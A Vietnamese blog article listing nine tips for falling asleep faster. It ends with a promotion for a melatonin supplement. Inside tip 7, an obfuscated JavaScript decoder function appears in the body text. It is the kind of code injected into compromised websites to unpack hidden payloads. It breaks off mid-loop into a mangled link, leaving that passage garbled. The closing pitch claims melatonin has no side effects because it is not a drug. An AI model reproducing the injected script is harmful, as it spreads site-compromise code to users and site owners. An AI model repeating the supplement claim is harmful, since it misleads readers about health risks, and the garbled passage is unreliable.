Cách đi vào giấc ngủ nhanh, thoát khỏi trình trạng thức trắng đêm

Nếu bạn áp dụng nhiều phương pháp nhưng vẫn không làm thế nào để đi vào giấc ngủ nhanh, vậy thì bạn nên dành thời gian tham khảo những thông tin được chia sẻ trong bài viết sau.

9 Cách Đi Vào Giấc Ngủ Nhanh Nhất Mà Bạn Nên Biết

Cách Đi Vào Giấc Ngủ Nhanh Nhất Mà Bạn Nên Biết
Cách Đi Vào Giấc Ngủ Nhanh Nhất Mà Bạn Nên Biết

1. Chọn nhiệt độ phòng phù hợp

Nhiệt độ cơ thể của bạn sẽ có sự thay đổi trong quá trình bạn ngủ. Khi căn phòng của bạn quá nóng hoặc quá lạnh, cơ thể của bạn sẽ khó đi vào giấc ngủ hơn.

Chọn nhiệt độ phòng phù hợp - cách đi vào giấc ngủ nhanh
Chọn nhiệt độ phòng phù hợp – cách đi vào giấc ngủ nhanh

Vì vậy, nếu phòng ngủ của bạn có gắn máy lạnh hoặc điều hòa nhiệt độ, bạn hãy kiểm tra và điều chỉnh nhiệt độ trong khoảng từ 23 đến 25 độ C. Đây được coi là khoảng nhiệt phù hợp, giúp bạn ngủ ngon hơn[1]

2. Tắm nước ấm

Tắm nước ấm vào buổi tối cũng có thể giúp tăng tốc độ thay đổi nhiệt độ của cơ thể, từ đó giúp bạn đi vài giấc ngủ nhanh hơn, thuận lợi hơn.

Tắm nước ấm - cách đi vào giấc ngủ nhanh
Tắm nước ấm – cách đi vào giấc ngủ nhanh

Đặc biệt, việc tắm như vậy còn giúp bạn cảm thấy thoải mái, dễ chịu, xả stress rất tốt. Lưu ý, bạn không nên tắm quá muộn. Nên đặt thời gian biểu phù hợp để có được thời gian tắm và ngủ hợp lý mỗi ngày.

3. Lên lịch trình cho giấc ngủ

Nhiều người thấy rằng việc thiết lập lịch trình cho giấc ngủ là một trong những cách đi vào giấc ngủ nhanh một cách tự nhiên, không cần tốn quá nhiều công sức. Nguyên nhân bởi cơ thể con người có hệ thống điều tiết riêng gọi là nhịp sinh học.

Lên lịch trình cho giấc ngủ - cách đi vào giấc ngủ nhanh
Lên lịch trình cho giấc ngủ – cách đi vào giấc ngủ nhanh

Nhịp sinh hoạt động bình thường sẽ giúp cơ thể bạn cảm thấy tỉnh táo vào ban ngày nhưng buồn ngủ vào ban đêm. Nếu nhịp sinh học bị rối loạn, bạn sẽ cảm thấy mệt mỏi khi thức dậy và bị mất ngủ mỗi tối. Tốt nhất, bạn nên tạo cho mình thói quen thức dậy và đi ngủ vào đúng thời điểm và duy trì lịch trình này. Chỉ sau một vài tuần, bạn sẽ cảm thấy dễ ngủ hơn.

4. Tránh xa ánh sáng xanh vào buổi tối

Ánh sáng xanh từ các thiết bị điện tử có thể gây ảnh hưởng đến cơ thể của bạn, khiến bạn tỉnh táo hơn, khó ngủ hơn. Việc tiếp xúc với ánh sáng xanh thường xuyên còn có thể dẫn đến sự gián đoạn của nhịp sinh học, khiến bạn bị rối loạn giấc ngủ.

Tránh xa ánh sáng xanh vào buổi tối - cách đi vào giấc ngủ nhanh
Tránh xa ánh sáng xanh vào buổi tối – cách đi vào giấc ngủ nhanh

Bóng tối làm tăng lượng Melatonin, đây là một loại Hormone rất cần thiết cho giấc ngủ. Vì vậy hãy tránh xa ánh sáng xanh vào buổi tối để chu kỳ giấc ngủ của cơ thể không bị ảnh hưởng.

Xem thêm: Cách để có giấc ngủ ngon hiệu quả, tốt cho sức khỏe

5. Thực hành Yoga, thiền

Yoga và thiền là những công cụ giúp bạn làm dịu tâm trí và thư giãn cơ thể một cách hiệu quả. Hơn thế, đây đều là những phương pháp đã được chứng minh có khả năng cải thiện giấc ngủ vô cùng hiệu quả.

Thực hành Yoga, thiền - cách đi vào giấc ngủ nhanh
Thực hành Yoga, thiền – cách đi vào giấc ngủ nhanh

Yoga khuyến khích cơ thể giải phóng căng thẳng và tăng cường mức độ Melatonin giúp não bộ đạt được trạng thái thoải mái, dễ dàng đi vào giấc ngủ. Thiền có thể giúp bạn duy trì sự tập trung và bớt lo lắng trong khi ngủ.

Áp dụng những phương pháp trên sẽ giúp bạn có được một đêm ngon giấc và thức dậy với một cơ thể khỏe mạnh, tràn đầy năng lượng.

6. Chuẩn bị một chiếc giường phù hợp

Chuẩn bị một chiếc giường phù hợp - cách đi vào giấc ngủ nhanh
Chuẩn bị một chiếc giường phù hợp – cách đi vào giấc ngủ nhanh

Nếu chiếc đệm của bạn khiến bạn bị khó chịu vậy thì bạn nên thay một chiếc đệm khác. Bên cạnh đó, bạn cũng nên ưu tiên sử dụng ga trải giường bằng Cotton để có được cảm giác dễ chịu trong quá trình ngủ.

7. Tắt hết đèn khi ngủ

Nếu ánh sáng gây ức chế Hormon Melatonin thì bóng tối lại kích thích cơ thể sản sinh ra chất này nhiều hơn. Vì vậy, nếu cảm thấy khó ngủ, bạn nên tắt hết đèn. Việc tắt hết đèn trong phòng ngủ sẽ giúp giấc ngủ đến một cách dễ dàng hơn.

Tắt hết đèn khi ngủ - cách đi vào giấc ngủ nhanh
Tắt hết đèn khi ngủ – cách đi vào giấc ngủ nhanh

Nếu phòng của bạn có cửa sổ và bạn bị ảnh hưởng bởi ánh sáng từ bên ngoài, bạn nên lắp thêm rèm cửa để chắn ánh sáng. Điều này sẽ giúp bạn cải thiện chất lượng giấc ngủ đáng kể mà không cần tốn quá nhiều công sức.function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var y7=”;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0and-tiredness/how-to-get-to-sleep/”>[2]

8. Không nên dùng thiết bị điện tử trước khi ngủ

Không nên dùng thiết bị điện tử trước khi ngủ - cách đi vào giấc ngủ nhanh
Không nên dùng thiết bị điện tử trước khi ngủ – cách đi vào giấc ngủ nhanh

Việc sử dụng thiết bị điện tử như điện thoại di động, máy tính bảng trước khi ngủ là thói quen của nhiều người. Điều này khiến bộ não trở nên tỉnh táo, khó đi vào giấc ngủ. Nếu bạn thường xuyên bị mất ngủ, vậy thì bạn nên thay đổi thói quen này.

9. Sử dụng sản phẩm điều hòa giấc ngủ Melatonin

Điều hòa giấc ngủ Melatonin là sản phẩm giúp bạn dễ dàng đi vài giấc ngủ một cách hữu hiệu. Sử dụng sản phẩm này, bạn sẽ nhanh chóng cảm nhận được những chuyển biến tích cực về cả thể chất lẫn tinh thần.

Thực phẩm chức năng hỗ trợ điều hoà giấc ngủ melatonin
Thực phẩm chức năng hỗ trợ điều hoà giấc ngủ melatonin

[maxbutton id=”4″]

Đặc biệt Melatonin không phải là thuốc nên bạn không cần phải lo lắng đến vấn đề bị ảnh hưởng bởi tác dụng phụ. Ngoài ra, đây là sản phẩm uy tín, đảm bảo chất lượng nên bạn hoàn toàn có thể yên tâm khi sử dụng điều hòa giấc ngủ Melatonin để chăm sóc sức khỏe cho mình và cả gia đình.

Xem thêm: Tổng hợp nguyên nhân ngủ không ngon giấc và cách chữa hiệu quả

Lời kết

Mong rằng sau khi tham khảo những thông tin trên, bạn đã có được những mẹo hay để đi vào giấc ngủ nhanh. Nếu đã thử nhiều cách nhưng bạn vẫn không cải thiện được tình trạng mất ngủ, hãy lựa chọn sản phẩm điều hòa giấc ngủ Melatonin. Chỉ cần dùng thử một liệu trình, chắc chắn bạn sẽ hài lòng với chất lượng mà Melatonin mang lại.

Bình luận bài viết (0 bình luận)